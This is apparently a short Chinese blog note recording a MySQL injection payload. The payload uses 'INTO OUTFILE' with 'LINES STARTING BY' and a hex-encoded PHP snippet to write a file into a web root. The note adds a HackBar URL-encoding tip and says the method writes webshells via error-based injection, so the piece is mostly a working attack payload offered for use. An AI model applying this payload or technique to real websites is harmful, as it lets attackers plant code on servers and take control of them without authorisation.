做个记录:

select * from admin where userid=1 into outfile "x:\\wwwroot\\sx.php" LINES STARTING BY 0x3C3F70687020706870696E666F28293F3E%23

写完语句,要用hackbar的urlencode编码一下,不然很大几率是不成功的哟。
这个可以在基于MySQL的报错注入中写webshell。

0x3C3F70687020706870696E666F28293F3E=<?php phpinfo()?>

原理:

  • LINES STARTING BY ‘字符串’:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。

  • LINES TERMINATED BY ‘字符串’:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。

发表评论

电子邮件地址不会被公开。 必填项已用*标注